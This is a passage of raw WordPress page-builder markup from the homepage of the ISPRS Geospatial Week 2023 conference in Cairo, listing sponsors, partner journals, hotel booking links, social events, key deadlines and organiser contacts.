!important;}\"][vc_column_inner][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1691508515384{margin-top: 50px !important;}\"]</p>\r\n\r\n<h1 style=\"text-align: center;\">Journals partner</h1>\r\n<h3 style=\"text-align: center;\">The author has the opportunity to publish his/her articles in one of the following journals :</h3>\r\n&nbsp;\r\n<p style=\"text-align: center;\"><span style=\"color: #000000;\"><a style=\"color: #000000;\" href=\"https://www.springer.com/journal/43995/\"><span style=\"font-size: 14pt;\"><strong>Journal of Umm Al-Qura University for Engineering and Architecture</strong></span></a></span></p>\r\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong><a href=\"http://www.springer.com/journal/43995\">www.springer.com/journal/43995</a></strong></span></p>\r\n\r\n<h3></h3>\r\n&nbsp;\r\n\r\n&nbsp;\r\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt; color: #000000;\"><strong>Journal of Engineering and Thermal Sciences (JETS) ISSN (Online) 2669-2465</strong></span></p>\r\n<p style=\"text-align: center;\"><strong><span style=\"font-size: 14pt;\"><a href=\"http://www.extrica.com/journal/jets\">www.extrica.com/journal/jets</a></span></strong></p>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1692141209167{margin-top: -70px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]\r\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096010128{margin-top: 50px !important;}\"]\r\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\r\n<span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219836213{margin-top: -px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951584642{margin-top: 45px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][vc_column_text css=\".vc_custom_1688951717998{margin-top: 90px !important;}\"]<a href=\"https://www.agisoft.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4987 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image-300x102.png\" alt=\"\" width=\"300\" height=\"102\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690459872519{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n&nbsp;\r\n<p style=\"text-align: center;\"><a href=\"https://www.piesat.cn/en-us/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5053\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/5X5cm-PIESAT-Logo-300x300.png\" alt=\"\" width=\"276\" height=\"276\" /></a></p>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690460056235{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\r\n&nbsp;\r\n<p style=\"text-align: center;\"><a href=\"https://www.vexcel-imaging.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4990 \" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image002.jpg\" alt=\"\" width=\"179\" height=\"213\" /></a></p>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951105389{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" />\r\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096367037{margin-top: 50px !important;}\"]</p>\r\n\r\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\r\n<a href=\"https://www.riegl.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096532104{margin-top: 88px !important;}\"]<a href=\"https://www.robotlab.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690251276274{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\r\n<a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-e1690251327743-300x167.png\" alt=\"\" width=\"309\" height=\"172\" /></a>\r\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants.</p>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690452445334{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Tourism partner</span></h4>\r\n<h4 style=\"text-align: center;\"><a href=\"https://funtrip-travel.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5041\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/LOGO-FINAL2-300x184.jpg\" alt=\"\" width=\"265\" height=\"163\" /></a></h4>\r\n<p style=\"text-align: center;\">Email : <span style=\"color: #3366ff;\"><strong>gsw2023@funtrip-travel.com</strong></span></p>\r\n<p style=\"text-align: center;\">Mobile no and WhatsApp: <span style=\"color: #3366ff;\"><strong>+201221541515</strong></span></p>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Ffuntrip-travel.com%2F|title:FunTrip|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690452582489{margin-top: -15px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For FunTrip More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690600884765{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Exhibition organizer</span></h4>\r\n<h4 style=\"text-align: center;\"><a href=\"https://www.purespot.org/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5061\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/Logo-Pure-2-300x300.jpg\" alt=\"\" width=\"151\" height=\"151\" /></a></h4>\r\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt; color: #3366ff;\"><strong>project manager </strong></span>\r\n<span style=\"font-size: 8pt;\"><strong>Mr. Omar Mohamed</strong></span>\r\n<span style=\"font-size: 8pt;\">Email: omar.mohamed@egypure.org   </span><span style=\"font-size: 8pt;\"> phone : ⁦+20 100 098 8976⁩</span></p>\r\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt;\"><strong>Mr. Ahmed Refaat</strong></span>\r\n<span style=\"font-size: 8pt;\">Email: ahmed.refaat@egypure.org   </span><span style=\"font-size: 8pt;\">  phone :⁦+20 100 084 4792</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1691508515384{margin-top: 50px !important;}\"]</p>\r\n\r\n<h1 style=\"text-align: center;\">Journals partner</h1>\r\n<h3 style=\"text-align: center;\">The author has the opportunity to publish his/her articles in one of the following journals :</h3>\r\n&nbsp;\r\n<p style=\"text-align: center;\"><span style=\"color: #000000;\"><a style=\"color: #000000;\" href=\"https://www.springer.com/journal/43995/\"><span style=\"font-size: 14pt;\"><strong>Journal of Umm Al-Qura University for Engineering and Architecture</strong></span></a></span></p>\r\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong><a href=\"http://www.springer.com/journal/43995\">www.springer.com/journal/43995</a></strong></span></p>\r\n\r\n<h3></h3>\r\n&nbsp;\r\n\r\n&nbsp;\r\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt; color: #000000;\"><strong>Journal of Engineering and Thermal Sciences (JETS) ISSN (Online) 2669-2465</strong></span></p>\r\n<p style=\"text-align: center;\"><strong><span style=\"font-size: 14pt;\"><a href=\"http://www.extrica.com/journal/jets\">www.extrica.com/journal/jets</a></span></strong></p>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1687848604610{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 10px !important;}\"]\r\n<h2 style=\"color: #311b92; text-align: center;\"><strong> EGYPT GSW\'2023</strong></h2>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row content_placement=\"top\" css=\".vc_custom_1687710509489{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/3\" css=\".vc_custom_1687711699560{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687711558584{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]\r\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity. <a href=\"https://gsw2023.com/index.php/welcome/\"><span style=\"text-decoration: underline;\"><strong><span style=\"color: #3366ff; text-decoration: underline;\">Read More</span></strong></span></a></p>\r\n[/vc_column_text][/vc_column][vc_column width=\"2/3\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#e8e8e8\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" team_position_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1687711659617{margin-top: 0px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"ex-full\" fadeout_row=\"fadeout_row_value\" enable_overlay=\"enable_overlay_value\" overlay_color=\"#3a3a3a\" overlay_pattern=\"transperant\" overlay_pattern_opacity=\"75\"][vc_column width=\"1/3\"][vc_column_text css=\".vc_custom_1687564704480{margin-top: -4px !important;margin-left: -50px !important;border-left-width: -50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 14pt;\">InterContinental Cairo Semiramis</span></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"298\" height=\"168\" /></span></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Conference Venue </span></h4>\r\n&nbsp;\r\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\r\n<h5></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fredirect%3Fpath%3Dasearch%26brandCode%3D6C%26localeCode%3Den%26regionCode%3D1%26hotelCode%3DCROHA%26checkInDate%3D01%26checkInMonthYear%3D082023%26checkOutDate%3D08%26checkOutMonthYear%3D082023%26rateCode%3DAAFST%26_PMID%3D99801505%26GPC%3DARA%26cn%3Dno%26viewfullsite%3Dtrue|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690569939761{margin-top: -25px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/3\" awb_type=\"image\"][vc_column_text css=\".vc_custom_1687553105001{margin-top: 0px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt; color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7);\">Ramses Hilton hotel</span></h4>\r\n<h4></h4>\r\n<img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" />\r\n\r\n&nbsp;\r\n<h4 style=\"text-align: center;\"></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690251704410{margin-top: 10px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][vc_btn title=\"For More Hotels\" color=\"info\" align=\"center\" link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fhotel-accommodation%2F\"][/vc_column][vc_column width=\"1/3\"][vc_column_text]\r\n<h4 class=\"qrShPb pXs6bb PZPZlf q8U8x aTI8gc EaHP9c\" style=\"text-align: center;\" data-dtype=\"d3ifr\" data-local-attribute=\"d3bn\" data-attrid=\"title\" data-ved=\"2ahUKEwi88f_AuNX_AhU5gv0HHQT_D7wQ3B0oAHoECDsQAQ\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 18pt;\">Flamenco Cairo Hotel</span></h4>\r\n<h4></h4>\r\n<a href=\"https://www.flamencohotels.com/web/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter\" src=\"https://www.flamencohotels.com/web/wp-content/uploads/2020/02/4Z4A4470-Low.jpg\" alt=\"\" width=\"281\" height=\"187\" /></a>\r\n\r\n&nbsp;\r\n<h4 style=\"text-align: center;\"></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is September 1, 2023</span></h5>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fflamenco-cairo-hotel%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687391423079{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1687570749968{margin-top: 12px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\" css=\".vc_custom_1687570624975{margin-top: 140px !important;}\"][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1687570128641{margin-top: -70px !important;}\"][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692140427657{margin-top: 50px !important;}\"]\r\n<h5 style=\"text-align: center;\"><strong>September 3, 2023</strong></h5>\r\n<h5 style=\"text-align: center;\"><strong><span lang=\"EN-US\">Dinner and Show on </span>Nile Crystal Cruising Restaurant</strong></h5>\r\n<img class=\"wp-image-5195 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/d2-1-300x300.jpg\" alt=\"\" width=\"198\" height=\"198\" />[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570551843{margin-top: 50px !important;}\"]\r\n<h5 style=\"text-align: center;\">September 5, 2023</h5>\r\n<h5 style=\"text-align: center;\">Dinner and Show on The Citadel of Cairo</h5>\r\n<img class=\"wp-image-5196 size-medium aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/d1-1-300x201.jpg\" alt=\"\" width=\"300\" height=\"201\" />[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][ultimate_heading main_heading=\"Important Dates\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-top:25px;margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]\r\n<ul>\r\n 	<li style=\"text-align: left;\">\r\n<h5><span style=\"color: #ffffff;\"><strong>Camera ready paper submission: July 15, 2023 </strong></span></h5>\r\n</li>\r\n 	<li style=\"text-align: left;\">\r\n<h5><span style=\"color: #ffffff;\"><strong>Deadline for submission of travel grants funded by The ISPRS Foundation is: June 16, 2023</strong></span></h5>\r\n</li>\r\n 	<li style=\"text-align: left;\">\r\n<h5><span style=\"color: #ffffff;\"><strong>Early bird registration deadline: July 1, 2023</strong></span></h5>\r\n</li>\r\n</ul>\r\n[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][/vc_column][vc_column width=\"1/2\"][ultimate_heading main_heading=\"Invitation Letter\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]\r\n<h2 style=\"text-align: center;\"></h2>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>You can generate an invitation letter automatically once you provide your information.</strong></span></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span><strong><span style=\"color: #ffff00;\"><a style=\"color: #ffff00;\" href=\"https://visa.gsw2023.com/\" target=\"_blank\" rel=\"noopener\">Get Your Invitation letter</a></span></strong></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>If you require specific format for the Visa Letter, please Send email with the additional information to</strong></span></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00;\"><strong> </strong><a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\" target=\"_blank\" rel=\"noopener\">GSW-visa@gsw2023.com</a><strong> </strong></span></h5>\r\n[/ultimate_heading][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]\r\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\r\n[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"200px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" bwb_columns=\"desktop:4|h_tablet:3|v_tablet:2|phone:1\" post_title_bottom_margin=\"0px\" show_team_desc=\"n\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 